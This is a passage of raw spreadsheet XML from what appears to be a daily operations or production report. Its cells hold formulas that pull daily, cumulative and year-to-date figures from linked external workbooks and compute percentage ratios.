      <c r="V21" s="209">
        <f>'[13]29'!$U$81</f>
        <v>33.7831657088123</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]29'!$V$81</f>
        <v>35.9377200030609</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]29'!$Q$81</f>
        <v>10.0830555555556</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]29'!$R$81</f>
        <v>235.130833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]29'!$S$81</f>
        <v>3130.89416666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]29'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]29'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'28'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]29'!$I$17</f>
        <v>7094.18</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'28'!K22</f>
        <v>195411.99</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2086873.37</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]29'!$L$17</f>
        <v>57214.362</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>28.607181</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]29'!$W$79</f>
        <v>104.661592123576</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]29'!$X$79</f>
        <v>102.579266871254</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]29'!$Y$79</f>
        <v>102.287930093333</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]29'!$T$79</f>
        <v>67.3599537037037</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]29'!$U$79</f>
        <v>49.9921775223499</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]29'!$V$79</f>
        <v>45.7472961942659</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]29'!$Q$79</f>
        <v>16.1663888888889</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]29'!$R$79</f>
        <v>347.945555555556</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]29'!$S$79</f>
        <v>3985.50444444444</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]29'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]29'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'28'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]29'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'28'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]29'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]29'!$W$80</f>
        <v>79.7777777777778</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]29'!$X$80</f>
        <v>83.8071521278055</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]29'!$Y$80</f>
        <v>79.5571133882431</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]29'!$T$80</f>
        <v>18.75</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]29'!$U$80</f>
        <v>37.8228767560664</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]29'!$V$80</f>
        <v>32.9212931078461</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]29'!$Q$80</f>
        <v>4.5</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]29'!$R$80</f>
        <v>263.247222222222</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]29'!$S$80</f>
        <v>2868.10305555556</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]29'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]29'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'28'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]29'!$I$56</f>
        <v>1433.18</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'28'!K24</f>
        <v>42654.21</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>322480.74</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]29'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]29'!$R$6</f>
        <v>78.25</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]29'!$S$6</f>
        <v>83.5522776183644</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]29'!$T$6</f>
        <v>85.9101293103448</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]29'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]29'!$P$6</f>
        <v>64.0919540229885</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]29'!$Q$6</f>
        <v>53.2598714416896</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]29'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]29'!$M$6</f>
        <v>446.08</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]29'!$N$6</f>
        <v>4640</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]29'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'28'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]29'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'28'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]29'!$R$7</f>
        <v>178.190476190476</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]29'!$S$7</f>
        <v>188.838548185232</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]29'!$T$7</f>
        <v>187.685885375208</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]29'!$O$7</f>
        <v>43.75</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]29'!$P$7</f>
        <v>57.3994252873563</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]29'!$Q$7</f>
        <v>50.7584940312213</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]29'!$L$7</f>
        <v>10.5</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]29'!$M$7</f>
        <v>399.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]29'!$N$7</f>
        <v>4422.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'28'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'28'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]29'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]29'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]29'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]29'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]29'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]29'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]29'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]29'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]29'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'28'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'28'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]29'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]29'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]29'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]29'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]29'!$U$69</f>
        <v>54.8347701149425</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]29'!$V$69</f>
        <v>67.2925849403122</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]29'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]29'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]29'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'28'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'28'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]29'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]29'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]29'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]29'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]29'!$U$104</f>
        <v>33.1849137931034</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]29'!$V$104</f>
        <v>61.8803604224059</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]29'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]29'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]29'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'28'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'28'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]29'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]29'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]29'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]29'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]29'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]29'!$V$105</f>
        <v>32.187580348944</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]29'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]29'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]29'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'28'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'28'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]29'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]29'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]29'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]29'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]29'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]29'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]29'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]29'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]29'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]29'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]29'!$E$16</f>
        <v>3489</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'28'!H31</f>
        <v>131552</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1504559</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]29'!$I$16</f>
        <v>4773.24999999999</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'28'!K31</f>
        <v>144144.89</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1500193.02</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]29'!$L$16</f>
        <v>52836.48</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>70.44864</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'[11]29'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]29'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'28'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]29'!$I$13</f>
        <v>2667</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'28'!K32</f>
        <v>97089</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1118567</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]29'!$L$13</f>
        <v>41545.226</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>83.090452</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]29'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]29'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]29'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]29'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]29'!$U$76</f>
        <v>4.02298850574713e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]29'!$V$76</f>
        <v>4.10927456382002e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]29'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]29'!$R$76</f>
        <v>2.8e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]29'!$S$76</f>
        <v>3.58e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]29'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'28'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]29'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'28'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]29'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]29'!$W$77</f>
        <v>22.13</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]29'!$X$77</f>
        <v>20.89</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]29'!$Y$77</f>
        <v>19.81</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]29'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]29'!$U$77</f>
        <v>28.768678160921</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]29'!$V$77</f>
        <v>60.3770661157038</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]29'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]29'!$R$77</f>
        <v>200.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]29'!$S$77</f>
        <v>5260.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]29'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'28'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]29'!$I$50</f>
        <v>1367.93</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'28'!K34</f>
        <v>24877.28</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>492080.21</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]29'!$L$15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'[11]29'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'28'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]29'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'28'!K35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G36+'28'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'28'!K36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G37+'28'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'28'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]29'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]29'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]29'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'28'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]29'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'28'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]29'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'28'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'28'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]29'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]29'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]29'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'28'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]29'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'28'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]29'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'28'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'28'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]29'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]29'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]29'!$R$50</f>
        <v>406.56</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'28'!U39</f>
        <v>9227.06</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>88040.659</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]29'!$V$50</f>
        <v>301</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'28'!X39</f>
        <v>8967</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>87726</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]29'!$Y$50</f>
        <v>1491.606</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'28'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'28'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
